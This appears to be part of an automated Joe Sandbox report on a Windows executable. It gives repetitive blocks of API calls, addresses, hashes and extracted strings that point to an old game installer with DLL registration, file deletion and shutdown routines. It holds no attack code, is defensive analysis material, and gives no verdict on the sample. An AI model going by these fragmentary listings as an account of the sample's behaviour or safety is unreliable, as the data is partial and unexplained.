                                                                                                                                              • Instruction ID: 60f35962d690970186fbe8e082cbe82d24c67d20d37591994032dbb9b5c60f80
                                                                                                                                              • Opcode Fuzzy Hash: e506baffcbc136c6131d4a1c8671d6fc93e4fe8248ca6c74d0802763e75e9641
                                                                                                                                              • Instruction Fuzzy Hash: C5A14871508740BBE320DB60CC45FEB77A8ABC9705F04465EFE8957282DB789984CB6E
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000), ref: 00413E61
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413E88
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,0040B0FB,?,?,?,00000000,00000001,?,?,ask For CD - working dir,00000000,00404385), ref: 00413EA4
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00413EB8
                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00414023
                                                                                                                                              • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000030,00000000,00000000,0045E440,0045E484,?,?,00000000), ref: 0041405B
                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0041407C
                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,00000000), ref: 00414098
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 004140DD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$FindProcess$CloseCodeCreateErrorExitFileFirstLastSleep
                                                                                                                                              • String ID: "%s"$CreateProcess$Error executing '%s'%s$Exec And Wait
                                                                                                                                              • API String ID: 3676699910-1096974953
                                                                                                                                              • Opcode ID: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                                              • Instruction ID: 0d36562a55edf719c25e91f2d3ffa3eb5e978c8fbce3c5ea020dbcf3caa10d05
                                                                                                                                              • Opcode Fuzzy Hash: 47fab39d792b6b31dfce4871978132716f4f91e3c138206beb0a83e96ad15d9d
                                                                                                                                              • Instruction Fuzzy Hash: 8081E271248341ABD320DF60DC45FEBB7A8EBC5B01F10491EFA8497280DBB99985CB5B
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 00414A1D
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414A39
                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?), ref: 00414B6C
                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00414C0C
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00414C16
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00414C2A
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00414C31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesFindSleep$CloseDeleteFirst
                                                                                                                                              • String ID: "%s"$/s /UnregServer$/u /s$Remove$dll$exe$exec: %s /s /UnregServer %s$exec: %s /u /s %s$ocx
                                                                                                                                              • API String ID: 207913334-4138445747
                                                                                                                                              • Opcode ID: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                                              • Instruction ID: 569dca1f961776a68051f51d760419570266c25ba139ecdaab2e0422a95345d3
                                                                                                                                              • Opcode Fuzzy Hash: 7a27dd3ebb5889da30f2015b03362f2696fb5ccc79fbbb6d7542e5a1d3043de9
                                                                                                                                              • Instruction Fuzzy Hash: 345159B12843446BE224EB558C42FEB339CAFD5704F44491EFA88931C2EF7C954987AE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Chinese (Simplified)$Chinese (Traditional)$Czech$Danish$Dutch$English UK$English US$Finnish$French$German$Greek$Hebrew$Hungarian$Italian$Japanese$Korean$PortBrzl$Russian$Spanish$Swedish
                                                                                                                                              • API String ID: 0-733503574
                                                                                                                                              • Opcode ID: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                                              • Instruction ID: 37a5b3b5c5b6eab396eacb203a264361d5579e56741c889a3fa2050163f780a9
                                                                                                                                              • Opcode Fuzzy Hash: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                                              • Instruction Fuzzy Hash: 5981481B3125C08AD769877554602BB7FA2ABAB344B1DC0BFC4886B3A2FE654C47C30D
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040A1F6
                                                                                                                                              • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseNext$DeleteFirstSleep
                                                                                                                                              • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 2815766398-138872489
                                                                                                                                              • Opcode ID: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                                              • Instruction ID: 0c91d48e411e499a262bfaaa4cfdbc113dac507737b5f6b4774de972c7e6e324
                                                                                                                                              • Opcode Fuzzy Hash: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                                              • Instruction Fuzzy Hash: 5261F872108340ABE720DF60CC45FEB73A8EBC4704F44492EB98957181DB79A609CBAA
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00417F1B
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00417F97
                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00417FA7
                                                                                                                                              • FindClose.KERNEL32(?), ref: 00417FBA
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00417FEA
                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0041807D
                                                                                                                                              • FindClose.KERNEL32(?), ref: 00418090
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004180B9
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0041813E
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00418149
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext$AddressDirectoryLibraryLoadProc$DeletePathSystemTempWindows
                                                                                                                                              • String ID: %s\%s$%s\*_uninst.exe
                                                                                                                                              • API String ID: 1160109514-2858441004
                                                                                                                                              • Opcode ID: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                                              • Instruction ID: 9f6682103830e505521cd8484b6fe5b054a565d779c716c41cdb5f6c531036c0
                                                                                                                                              • Opcode Fuzzy Hash: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                                              • Instruction Fuzzy Hash: 5681A6B21083445BD324DF60CD45BEBB7ACEBC8714F444D1EF99583181EB789649CBAA
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414422
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041443A
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414494
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004144AC
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 004144BD
                                                                                                                                              • RemoveDirectoryA.KERNEL32(?), ref: 004144D6
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414552
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041456A
                                                                                                                                              • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414585
                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00414594
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseDirectoryFileFirst$Remove$CreateSleep
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 593529018-2967466578
                                                                                                                                              • Opcode ID: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                                              • Instruction ID: 0fb53b54470e76bddbd086c82c8af96ee8b09f8716e29362b9a934bf63ba6167
                                                                                                                                              • Opcode Fuzzy Hash: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                                              • Instruction Fuzzy Hash: 686128352083859FC321CF28D8447EBBBD6ABD6354F084A5DE8D483351DA39D94DCB5A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @J2G$L$L$NJC7$W$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-3995663177
                                                                                                                                              • Opcode ID: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                                              • Instruction ID: 252a6d8ed46e94f7374cf00b11fef3c12c06f11e1c1bd39a3460dd2fa65f4b0d
                                                                                                                                              • Opcode Fuzzy Hash: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                                              • Instruction Fuzzy Hash: 849133A1D142948AF7258B24EC597EB7675EF91300F0440FED44AAB381E27E1F91CB2B
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414CC8
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*$\$\*.*
                                                                                                                                              • API String ID: 2001080981-2301768657
                                                                                                                                              • Opcode ID: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                                              • Instruction ID: a8a72605bd69f8ac0c64504b566f5f70f8f2b3987ac3faeae44afcbdd81da1c4
                                                                                                                                              • Opcode Fuzzy Hash: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                                              • Instruction Fuzzy Hash: 707139711087854BD721CB24A8187FBB7D9EFC2305F14492AEDC597341EB38988A87AA
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Version
                                                                                                                                              • String ID: Microsoft Win32s$Unknown$Windows 2000$Windows 95$Windows 98$Windows ME$Windows NT$Windows XP
                                                                                                                                              • API String ID: 1889659487-1287414207
                                                                                                                                              • Opcode ID: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                                              • Instruction ID: 975d6d164ef17e93e1c34ab1fc7ce7197d2ce6e84d94eff38267c9a8d95a5eee
                                                                                                                                              • Opcode Fuzzy Hash: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                                              • Instruction Fuzzy Hash: B3510EFC9063428BC369CF18FC509997BE5EB9A316B05467ED86883372D7309484CB5E
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413853
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041385A
                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00413874
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004138B4
                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004138BE
                                                                                                                                              • GetLastError.KERNEL32(00000400,00000000,00000000,00000000), ref: 004138D4
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004138E2
                                                                                                                                              • LocalFree.KERNEL32(?,?,SHUTDOWN FAILED,00000000), ref: 004138FF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitFormatFreeLastLocalLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                                                                              • String ID: SHUTDOWN FAILED$SeShutdownPrivilege
                                                                                                                                              • API String ID: 2448987565-1691336667
                                                                                                                                              • Opcode ID: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                                              • Instruction ID: 07b04e0414a2500c08cba524246ac508bc9e29567ebddda6aac245e4067d3e71
                                                                                                                                              • Opcode Fuzzy Hash: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                                              • Instruction Fuzzy Hash: 4E112EB4248300BBE310DF90DC4AF6BBBA8AB89B42F11451DFA45D61D1DBB495448B2A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00414F30: FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                                                • Part of subcall function 00414F30: FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                                                • Part of subcall function 00426C69: DeleteFileA.KERNEL32(?,0041900D,?,?,%s\filelist.txt,?,?), ref: 00426C6D
                                                                                                                                                • Part of subcall function 00426C69: GetLastError.KERNEL32 ref: 00426C77
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$First$CloseDeleteErrorLast
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3118232422-438819550
                                                                                                                                              • Opcode ID: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                                              • Instruction ID: cbf47a1fe9aaabdb544cd48c2d0f09c466b47d1d9ba07135cc4e04564ba086e3
                                                                                                                                              • Opcode Fuzzy Hash: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                                              • Instruction Fuzzy Hash: 47F14D3120CB86CBC721CB288864BFBB7D5AFD6344F544A6DE8C987341EB359849C796
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 1974802433-438819550
                                                                                                                                              • Opcode ID: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                                              • Instruction ID: 1877e94ef0ce8ff5fbf0691ca38f6eac6a25572973ee1466535c20e71dfeb6f4
                                                                                                                                              • Opcode Fuzzy Hash: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                                              • Instruction Fuzzy Hash: 34C10931208B86CBC721CB2484647FBB7E5BFD6345F58496EE8C683301EB35984AC796
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 2001080981-438819550
                                                                                                                                              • Opcode ID: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                                              • Instruction ID: d464e212dd68eb2a0debe0c153d34ad098e3c75a0d726ec831b8764db62cd133
                                                                                                                                              • Opcode Fuzzy Hash: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                                              • Instruction Fuzzy Hash: 7C8125351087C68BC725DF249824BEBB7D5EFD3345F144A2AE8C587340EB39988AC795
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 2001080981-438819550
                                                                                                                                              • Opcode ID: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                                              • Instruction ID: 72dfbb3d70468e9ec892d8d425d37a8d7061e44efa945190d4a59d62a0781805
                                                                                                                                              • Opcode Fuzzy Hash: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                                              • Instruction Fuzzy Hash: 465134351087C58BC725DF2498247EBB7D5FBD2305F144A2EE8C587341EB39988AC796
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00411158
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00411166
                                                                                                                                              • LocalFree.KERNEL32(?,00000000,?,setSwapSize,00000000), ref: 00411184
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                              • String ID: %I64d$SOFTWARE\$SwapSize$setSwapSize
                                                                                                                                              • API String ID: 1365068426-648712029
                                                                                                                                              • Opcode ID: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                                              • Instruction ID: 68c570f812988241753bd2a04a9715a3b5369f07d8492d5d9d524d181d3e445a
                                                                                                                                              • Opcode Fuzzy Hash: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                                              • Instruction Fuzzy Hash: 96412571208341ABD314CF28C811BBBB7E5FBC9704F108A1EFA9597290DB75A846C79A
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 3541575487-1173974218
                                                                                                                                              • Opcode ID: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                                              • Instruction ID: 73ed92b0838a6fd84eecc73f45936914938e06500c24726ad6d6a21ef8ce5d97
                                                                                                                                              • Opcode Fuzzy Hash: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                                              • Instruction Fuzzy Hash: 14414C751087854BC721CB24A8147FBBBD5FBD2306F144929EDC587301EB39988AC7AA
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA), ref: 0040F690
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040F697
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F6AB
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F6CF
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0040F6EA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                              • API String ID: 3160920872-3712701948
                                                                                                                                              • Opcode ID: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                                              • Instruction ID: 7ad7b93e94fca053afe9f72b981c6a2b3715ccf3ef72a9c3208e8f43e9ae2302
                                                                                                                                              • Opcode Fuzzy Hash: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                                              • Instruction Fuzzy Hash: 13214336208302AFC311DF65D804F9B77E4BB96304F05897EF581A2150EA74D508CBA7
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000003,dll,?,?,75920F00,00414AE2,?), ref: 004148DE
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 004148E7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00414902
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0041490F
                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00414916
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLibraryMode$AddressFreeLoadProc
                                                                                                                                              • String ID: DllRegisterServer$dll
                                                                                                                                              • API String ID: 2523496102-3743520154
                                                                                                                                              • Opcode ID: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                                              • Instruction ID: 5463a6723183e0fd2573a7326bb506f65ba7a9fbe54e5d5f4bd9aa869cd4d228
                                                                                                                                              • Opcode Fuzzy Hash: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                                              • Instruction Fuzzy Hash: 7BE06C773812242B85116BE97C099CBF79CDFD77727024033FA00D3111CA65984596B9
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,0040F4C0), ref: 004158C6
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004158D5
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0), ref: 0041592D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3541575487-438819550
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
